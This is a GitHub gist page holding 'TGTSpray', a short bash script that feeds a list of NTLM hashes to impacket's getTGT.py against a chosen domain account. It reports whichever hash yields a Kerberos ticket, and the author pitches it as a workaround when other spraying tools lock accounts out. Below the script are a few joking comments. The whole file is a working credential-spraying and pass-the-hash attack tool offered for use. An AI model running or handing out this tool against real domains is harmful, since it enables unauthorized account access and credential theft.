Skip to content

Instantly share code, notes, and snippets.

@0xjbb
Last active December 25, 2020 01:09
Show Gist options
  • Save 0xjbb/7fc8b49bbb34c63e80c1c40e7e6d4750 to your computer and use it in GitHub Desktop.
Save 0xjbb/7fc8b49bbb34c63e80c1c40e7e6d4750 to your computer and use it in GitHub Desktop.
TGTSpray. A tool to spray hashes when smb/winrm lock you out :(
#!/usr/bin/bash
# made by 0xjb, definitely not made for any ctf boxes
# Hash spraying when crackmapexec locks you out :(
# Is it good? no
# Did it work for me in a time of need? yes.
# Will it work for you? ¯\_(ツ)_/¯
if [ "$#" -ne 2 ];then
echo "Usage: $0 <DOMAIN/User> <File of NTLM hashes 'hash:hash'>"
exit;
fi
for hash in $(cat $2)
do
# If you're on the latest Kali, you will probably want to change getTGT to impacket-getTGT or w/e
cmdOuput=$(getTGT.py $1 -hashes $hash| grep -v "KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)" | grep -v "Impacket v0.9.22.dev1+20200915.115225.78e8c8e4 - Copyright 2020 SecureAuth Corporation")
if echo $cmdOuput | grep "Saving ticket in"; then
echo "Your Hash is: " $hash
exit;
fi
done
@Papadope-zz
Copy link

Nice!

@szymex73
Copy link

I wonder what it's for

@0xjbb
Copy link
Author

0xjbb commented Dec 22, 2020

I wonder what it's for

¯\(ツ)

@ToxicNaughty
Copy link

I wonder what this does.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment